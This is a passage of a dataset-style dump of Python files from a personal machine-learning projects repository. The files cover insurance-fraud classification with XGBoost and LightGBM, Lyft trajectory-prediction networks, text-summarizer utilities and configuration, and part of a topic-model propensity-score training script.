- start_time))\n\n" }, { "alpha_fraction": 0.6301233768463135, "alphanum_fraction": 0.6427092552185059, "avg_line_length": 43.899627685546875, "blob_id": "7267219f3bcc9f9704ebde4cb658d770bd27ed6e", "content_id": "0548bab740c61ac843afb020a14f3794333c2a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12077, "license_type": "no_license", "max_line_length": 112, "num_lines": 269, "path": "/Kaggle_Travelers/notebooks/Classification.py", "repo_name": 
"yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import model_selection\nfrom skopt import BayesSearchCV\nfrom matplotlib import pyplot\nfrom xgboost import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport lightgbm as lgb\n\nfrom random import sample\nimport random\nfrom statistics import mean\n\n\n##### Transform dataset for XGBoost and LightGBM #####\n\n### XGBoost\n# Import Data \ntrain = pd.read_csv(\"../data/train_data_clean_4_grouped.csv\")\ntest = pd.read_csv(\"../data/test_data_clean_4_grouped.csv\")\n\n# Encode gender and living status and state \ntrain[\"living_status\"] = pd.Categorical(train[\"living_status\"])\ntrain[\"gender\"] = np.where(train[\"gender\"].str.contains(\"M\"), 1, 0)\ntrain[\"living_status\"] = np.where(train[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\ntest[\"living_status\"] = pd.Categorical(test[\"living_status\"])\ntest[\"gender\"] = np.where(test[\"gender\"].str.contains(\"M\"), 1, 0)\ntest[\"living_status\"] = np.where(test[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(test['state'], \n prefix='state', 
drop_first=True)\ntest = pd.concat([test, state_dummies], axis=1)\ntest.drop([\"state\"], axis=1, inplace=True)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(train['state'], \n prefix='state', drop_first=True)\ntrain = pd.concat([train, state_dummies], axis=1)\ntrain.drop([\"state\"], axis=1, inplace=True)\n\n\n# Drop month, day and year data, drop vehicle color, zipcode, claim_date, claim_number and SP_Index #####\ntrain.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\ntest.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\n\n# Add saftyrating/(number of past claim) feature \ntrain['per_saftyrating'] = 
train['safty_rating']/(train['past_num_of_claims']+1)\ntest['per_saftyrating'] = test['safty_rating']/(test['past_num_of_claims']+1)\n\n\n# Delete some fraud_mean variables \ntrain.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\",\"Unem_rate\"],\n axis = 1, inplace = True)\ntest.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\", \"Unem_rate\"],\n axis = 1, inplace = True)\ntrain = train.filter(regex=\"^(?!state_).*$\")\ntest = test.filter(regex=\"^(?!state_).*$\")\n\ntrain_xgb = train.copy()\ntest_xgb = test.copy()\n\n\n### LightGBM\n# read full training data set\ndf_train = pd.read_csv('../data/train_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_train['gender'], \n prefix = 'gender', drop_first = True)\ndf_train = pd.concat([df_train, gender_dummies], axis = 1)\ndf_train.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_train['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_train = pd.concat([df_train, living_status_dummies], axis = 1)\ndf_train.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_train['state'], \n prefix = 'state', drop_first = True)\ndf_train = pd.concat([df_train, state_dummies], axis = 1)\ndf_train.drop([\"state\"], axis = 1, inplace = True)\n\ndf_train = df_train.sample(frac=1, 
random_state=5)\ndf_train['new_param'] = df_train.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf_train.set_index('claim_number', inplace=True)\ndf_train.sort_index(inplace=True)\ndf_train.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_train = df_train.filter(regex=\"^(?!state_).*$\")\ndf_train = df_train.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_day_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_month_).*$\")\n\ntrain_lgb = df_train.copy()\n\n# read full testing data set\ndf_test = pd.read_csv('../data/test_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_test['gender'], \n prefix = 'gender', drop_first = True)\ndf_test = pd.concat([df_test, gender_dummies], axis = 1)\ndf_test.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_test['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_test = pd.concat([df_test, living_status_dummies], axis = 1)\ndf_test.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_test['state'], \n prefix = 'state', drop_first = True)\ndf_test = pd.concat([df_test, state_dummies], axis = 1)\ndf_test.drop([\"state\"], axis = 1, inplace = True)\n\ndf_test['new_param'] = df_test.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf_test.set_index('claim_number', inplace=True)\ndf_test.sort_index(inplace=True)\ndf_test.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 
'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_test = df_test.filter(regex=\"^(?!state_).*$\")\ndf_test = df_test.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_day_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_month_).*$\")\n\ntest_lgb = df_test.copy()\n\n\n##### Use CV to get the result #####\n# Set the cost for misclassification\ncost_dict = {0: 0, 1: 1, -1: 5}\n\n# Set the seed list for splitting dataset\nseed_list = [100, 150, 200, 250, 300, 350]\n\n# Set the parameters of XGBoost and LightGBM\nclf = xgb.XGBClassifier(max_depth=3,\n learning_rate=0.06,\n n_estimators=180,\n silent=True,\n objective='binary:logistic',\n gamma=0.35,\n min_child_weight=5,\n max_delta_step=0,\n subsample=0.8,\n colsample_bytree=0.785,\n colsample_bylevel=1,\n reg_alpha=0.01,\n reg_lambda=1,\n scale_pos_weight=1,\n seed=1440,\n missing=None)\n\nlgbm_params = {'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\ncost_list = []\nthre_list = [0.364] # to try diffrent range, just modify this code\nfor threshold in thre_list:\n cost = []\n for seed in seed_list:\n # generate row indexes\n random.seed(seed)\n rindex = np.array(sample(range(len(train_xgb)), round(0.7 * len(train_xgb))))\n\n # Split train dataset into training and validation parts\n # train_xgb and test_xgb are for XGBoost, train_lgb and test_lgb are for LightGBM\n\n training_xgb = train_xgb.iloc[rindex, :]\n validation_xgb = 
train_xgb.drop(train_xgb.index[rindex])\n\n training_lgb = train_lgb.iloc[rindex, :]\n validation_lgb = train_lgb.drop(train_lgb.index[rindex])\n\n # XGBoost\n y_training_xgb = training_xgb[\"fraud\"]\n X_training_xgb = training_xgb.drop(\"fraud\", 1)\n y_validation_xgb = validation_xgb[\"fraud\"]\n X_validation_xgb = validation_xgb.drop(\"fraud\", 1)\n\n clf.fit(X_training_xgb, y_training_xgb)\n y_validation_prob_xgb = clf.predict_proba(X_validation_xgb)[:,1]\n\n # LightGBM\n y_training_lgb = training_lgb[\"fraud\"]\n X_training_lgb = training_lgb.drop(\"fraud\", 1)\n y_validation_lgb = validation_lgb[\"fraud\"]\n X_validation_lgb = validation_lgb.drop(\"fraud\", 1)\n\n\n lgbm = LGBMClassifier(**lgbm_params)\n lgbm.fit(X_training_lgb.values, y_training_lgb.values)\n y_validation_prob_lgb = lgbm.predict_proba(X_validation_lgb.values)[:,1]\n\n # Combine the result of two models\n validation_prob = 0.4 * y_validation_prob_xgb + 0.6 * y_validation_prob_lgb\n\n # Calculate the cost\n validation_pred = (validation_prob > threshold)*1 # a trick to transform boolean into int type\n cost.append(sum([cost_dict[i] for i in (validation_pred - y_validation_xgb)]))\n \n cost_list.append(mean(cost))\n\nmin_index = cost_list.index(min(cost_list))\nprint(thre_list[min_index])\nprint(cost_list[min_index])\n\n\n##### Fraud Classification #####\n# Predict on the test dataset\ncost_dict = {0: 0, 1: 1, -1: 5}\ntest_pred = pd.read_csv('../data/predictions/combined_predictions.csv')\ntest_pred['fraud'] = (test_pred['fraud'] > 0.364)*1\ntest_pred = test_pred.set_index('claim_number')\ntest_pred.to_csv('../data/predictions/fraud_classification.csv')\n\n# Estimate the cost on the test dataset\ncost_list[min_index] * len(test_xgb) / (0.3 * len(train_xgb))" }, { "alpha_fraction": 0.6105572581291199, "alphanum_fraction": 0.6236312985420227, "avg_line_length": 40.632652282714844, "blob_id": "aea0a66a80d5ff30d0fee011f4bedaa16285869f", "content_id": "e500c55ebe8349c611527be256d89850cf34bae6", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6119, "license_type": "no_license", "max_line_length": 105, "num_lines": 147, "path": "/lyft/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import torch\nfrom torch import nn\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom typing import Dict\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass LyftEffnet(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = EfficientNet.from_pretrained(\"efficientnet-b4\")\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone._conv_stem.in_channels = num_in_channels\n conv_weight = self.backbone._conv_stem.weight\n self.backbone._conv_stem.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone._fc.in_features \n self._fc = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n\n def forward(self, x):\n # convolution layers\n x = self.backbone.extract_features(x)\n \n # pooling and final linear layer\n x = self.backbone._avg_pooling(x)\n x = x.flatten(start_dim = 1)\n x = self.backbone._dropout(x)\n x = self._fc(x)\n\n # 
pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = torch.softmax(confidences, dim=1)\n return pred, confidences\n\n\nclass LyftDensenet(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = torch.hub.load(\"pytorch/vision:v0.6.0\", \"densenet161\", \n pretrained = True)\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone.features.conv0.in_channels = num_in_channels\n conv_weight = self.backbone.features.conv0.weight\n self.backbone.features.conv0.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone.classifier.in_features \n self.backbone.classifier = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n \n\n def forward(self, x):\n # convolution layers\n x = self.backbone(x)\n\n # pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = 
torch.softmax(confidences, dim=1)\n return pred, confidences\n\n\nclass LyftEffnetb7(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = EfficientNet.from_pretrained(\"efficientnet-b7\")\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone._conv_stem.in_channels = num_in_channels\n conv_weight = self.backbone._conv_stem.weight\n self.backbone._conv_stem.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone._fc.in_features \n self._fc = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n\n def forward(self, x):\n # convolution layers\n x = self.backbone.extract_features(x)\n \n # pooling and final linear layer\n x = self.backbone._avg_pooling(x)\n x = x.flatten(start_dim = 1)\n x = self.backbone._dropout(x)\n x = self._fc(x)\n\n # pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = torch.softmax(confidences, dim=1)\n return pred, confidences" }, { "alpha_fraction": 0.6302567720413208, "alphanum_fraction": 0.6401190757751465, "avg_line_length": 32.59375, "blob_id": 
"0f850798c5e1fc9c33ced75861ec4d1de24fef22", "content_id": "d3aa1d09a940f36a567630793049cbe4cb93be4e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5374, "license_type": "permissive", "max_line_length": 96, "num_lines": 160, "path": "/rbm_summarizer/data_util/utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#Content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/\nimport os\nimport pyrouge\nimport logging\nimport tensorflow as tf\nimport torch\n\ndef print_results(article, abstract, decoded_output):\n print (\"\")\n print('ARTICLE: %s', article)\n print('REFERENCE SUMMARY: %s', abstract)\n print('GENERATED SUMMARY: %s', decoded_output)\n print( \"\")\n\n\ndef make_html_safe(s):\n s.replace(\"<\", \"&lt;\")\n s.replace(\">\", \"&gt;\")\n return s\n\n\ndef rouge_eval(ref_dir, dec_dir):\n r = pyrouge.Rouge155()\n r.model_filename_pattern = '#ID#_reference.txt'\n r.system_filename_pattern = '(\\d+)_decoded.txt'\n r.model_dir = ref_dir\n r.system_dir = dec_dir\n logging.getLogger('global').setLevel(logging.WARNING) # silence pyrouge logging\n rouge_results = r.convert_and_evaluate()\n return r.output_to_dict(rouge_results)\n\n\ndef rouge_log(results_dict, dir_to_write):\n log_str = \"\"\n for x in [\"1\",\"2\",\"l\"]:\n log_str += \"\\nROUGE-%s:\\n\" % x\n for y in [\"f_score\", \"recall\", \"precision\"]:\n key = \"rouge_%s_%s\" % (x,y)\n key_cb = key + \"_cb\"\n key_ce = key + \"_ce\"\n val = results_dict[key]\n val_cb = results_dict[key_cb]\n val_ce = results_dict[key_ce]\n log_str += \"%s: %.4f with confidence interval (%.4f, %.4f)\\n\" % (key, val, val_cb, val_ce)\n print(log_str)\n results_file = os.path.join(dir_to_write, \"ROUGE_results.txt\")\n print(\"Writing final ROUGE results to %s...\"%(results_file))\n with open(results_file, \"w\") as f:\n f.write(log_str)\n\n\ndef calc_running_avg_loss(loss, 
running_avg_loss, summary_writer, step, decay=0.99):\n if running_avg_loss == 0: # on the first iteration just take the loss\n running_avg_loss = loss\n else:\n running_avg_loss = running_avg_loss * decay + (1 - decay) * loss\n running_avg_loss = min(running_avg_loss, 12) # clip\n loss_sum = tf.Summary()\n tag_name = 'running_avg_loss/decay=%f' % (decay)\n loss_sum.value.add(tag=tag_name, simple_value=running_avg_loss)\n summary_writer.add_summary(loss_sum, step)\n return running_avg_loss\n\n\ndef write_for_rouge(reference_sents, decoded_words, ex_index,\n _rouge_ref_dir, _rouge_dec_dir):\n decoded_sents = []\n while len(decoded_words) > 0:\n try:\n fst_period_idx = decoded_words.index(\".\")\n except ValueError:\n fst_period_idx = len(decoded_words)\n sent = decoded_words[:fst_period_idx + 1]\n decoded_words = decoded_words[fst_period_idx + 1:]\n decoded_sents.append(' '.join(sent))\n\n # pyrouge calls a perl script that puts the data into HTML files.\n # Therefore we need to make our output HTML safe.\n decoded_sents = [make_html_safe(w) for w in decoded_sents]\n reference_sents = [make_html_safe(w) for w in reference_sents]\n\n ref_file = os.path.join(_rouge_ref_dir, \"%06d_reference.txt\" % ex_index)\n decoded_file = os.path.join(_rouge_dec_dir, \"%06d_decoded.txt\" % ex_index)\n\n with open(ref_file, \"w\") as f:\n for idx, sent in enumerate(reference_sents):\n f.write(sent) if idx == len(reference_sents) - 1 else f.write(sent + \"\\n\")\n with open(decoded_file, \"w\") as f:\n for idx, sent in enumerate(decoded_sents):\n f.write(sent) if idx == len(decoded_sents) - 1 else f.write(sent + \"\\n\")\n\n #print(\"Wrote example %i to file\" % ex_index)\n\n\ndef get_devices(gpu_ids=[0]):\n if torch.cuda.is_available():\n device = torch.device(\"cuda:%d\" % (gpu_ids[0]))\n # torch.cuda.set_device(device)\n else:\n device = torch.device(\"cpu\")\n return device\n\n\n##============ Word Preprocessing ==========##\n\n# load the stopwords provided by Stanford CoreNLP\nf 
= open(\"/home/yang6367/gitrepos/cnn-dailymail/corenlp-stopwords.txt\")\nstopwords = f.read().split('\\n')\n\n# def remove_stopwords(words):\n# return [w for w in words if w not in stopwords]\n\ndef clean(words):\n # drop the words that are meaningless\n dropwords = stopwords + ['[UNK]', '[PAD]', '[START]', '[STOP]', '--', 'cnn', \\\n '!!!', '!!!!', \"'''\", \"**\", \"***\", \"****\", \"*****\", \"******\", \\\n \"*******\", \"--\", \"-rcb-\", \"/\"]\n return [w for w in words if w not in dropwords]\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nwordnet_lemmatizer = WordNetLemmatizer()\ndef lem(w):\n word1 = wordnet_lemmatizer.lemmatize(w, pos = \"n\")\n word2 = wordnet_lemmatizer.lemmatize(word1, pos = \"v\")\n word3 = wordnet_lemmatizer.lemmatize(word2, pos = (\"a\"))\n return word3\n# def lemmatize(words):\n# return [lem(w) for w in words]\ndef lemmatize(words):\n words_ = []\n for w in words:\n # use try/except to handle the ascii string in the words\n try:\n words_.append(lem(w))\n except:\n pass\n return words_\n\n\n# read the top 15k words into a list\nwith open(\"/home/yang6367/gitrepos/cnn-dailymail/top15k_words.txt\", \"r\") as f:\n top15k_words = [word.rstrip() for word in f.readlines()]\n\ndef keep_top15k(words):\n return [w for w in words if w in top15k_words]\n\nfrom collections import Counter, OrderedDict\nimport numpy as np\n# transform a word list into a word-count tensor\ndef get_word_count(words):\n # initialize the orderedDict\n ordered_dict = OrderedDict((w, 0) for w in top15k_words)\n # update the orderedDict\n for word, count in dict(Counter(words)).items():\n ordered_dict[word] = count\n # extract the word count as a list\n return ordered_dict.values()\n # return Variable(torch.Tensor(ordered_dict.values()).int())" }, { "alpha_fraction": 0.6781695485115051, "alphanum_fraction": 0.7479369640350342, "avg_line_length": 26.79166603088379, "blob_id": "ba144a8d4887bb246ef0cde6ad19f93f1b9ff6a2", "content_id": 
"fb77e66a4ebb890e8c1e523294e6a81143b4b1ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1333, "license_type": "permissive", "max_line_length": 143, "num_lines": 48, "path": "/rbm_summarizer/data_util/config.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import os\n\nroot_dir = os.path.expanduser(\"~\")\n\n#train_data_path = os.path.join(root_dir, \"ptr_nw/cnn-dailymail-master/finished_files/train.bin\")\ntrain_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/chunked/train_*\")\neval_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/val.bin\")\ndecode_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/test.bin\")\nvocab_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/vocab\")\nlog_root = os.path.join(root_dir, \"gitrepos/pointer_summarizer/log\")\n\n# Hyperparameters\nhidden_dim= 256\nemb_dim= 128\nbatch_size= 8\nmax_enc_steps=400\nmax_dec_steps=100\nbeam_size=4\nmin_dec_steps=35\nvocab_size=50000\n\nlr=0.15\nadagrad_init_acc=0.1\nrand_unif_init_mag=0.02\ntrunc_norm_init_std=1e-4\nmax_grad_norm=2.0\n\npointer_gen = True\nis_coverage = False\ncov_loss_wt = 1.0\n\neps = 1e-12\nmax_iterations = 500000\n\nuse_gpu=True\n\nlr_coverage=0.15\n\n\ngpu_ids = [7]\nbatch_size *= max(1, len(gpu_ids))\n\n\n# config for rbm\nadd_rbm = True\nlatent_dim = 200\n# rbm_ckpt_path = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm1618806575/iter_28000.pth.tar\" # trained using batch size 8\nrbm_ckpt_path = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm1618843026/iter_2000.pth.tar\" # trained using batch size 128" }, { "alpha_fraction": 0.558305025100708, "alphanum_fraction": 0.5637212991714478, "avg_line_length": 39.943477630615234, "blob_id": "386e495ae9ad4e46a3357ca1d9fbe62d3ae27b2c", "content_id": "42a027b49289b67a4567e4918884cf547479a5bf", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9416, "license_type": "no_license", "max_line_length": 110, "num_lines": 230, "path": "/textual_causality/etm-ps/run_ps2.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Train an ETM on CNNDM.\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import kl_div\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as sched\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import get_train_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM, PSNet\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=True)\n log = util.get_logger(args.save_dir, args.name)\n tbx = SummaryWriter(args.save_dir)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n\n # Set random seed\n log.info(f'Using random seed {args.seed}...')\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get data loader\n log.info('Building dataset...')\n train_dataset = CNNDM(os.path.join(args.data_dir, \"train\"), args.model_type, is_test = False)\n train_collate_fn = 
partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers, \n collate_fn=train_collate_fn)\n val_dataset = CNNDM(os.path.join(args.data_dir, \"val\"), args.model_type, is_test = False)\n val_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n val_loader = DataLoader(val_dataset, \n batch_size=args.batch_size, \n shuffle=False, \n num_workers=args.num_workers, \n collate_fn=val_collate_fn)\n\n # Get ETM\n log.info('Building ETM...')\n etm = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"ETM: {etm}\")\n\n etm = nn.DataParallel(etm, args.gpu_ids)\n log.info(f'Loading ETM checkpoint from {args.etm_load_path}...')\n etm= util.load_model(etm, args.etm_load_path, args.gpu_ids, return_step=False)\n\n etm = etm.to(device)\n etm.eval()\n for param in etm.parameters():\n param.requires_grad = False\n\n # get PS model\n log.info('Building Propensity Neural Net Model...')\n model = PSNet(n_features=args.num_topics)\n log.info(f\"PS Model: {model}\")\n \n model = nn.DataParallel(model, args.gpu_ids)\n if args.ps_load_path:\n model, step = util.load_model(model, args.ps_load_path, args.gpu_ids)\n else:\n step = 0\n \n model = model.to(device)\n model.train()\n ema = util.EMA(model, args.ema_decay)\n\n # Get saver\n saver = util.CheckpointSaver(args.save_dir,\n max_checkpoints=args.max_checkpoints,\n metric_name=args.metric_name,\n maximize_metric=args.maximize_metric,\n log=log)\n\n\n # Get optimizer and scheduler and loss\n if args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2_wd) # l2 weight decay\n elif args.optimizer == 'adagrad':\n optimizer = optim.Adagrad(model.parameters(), lr=args.lr, 
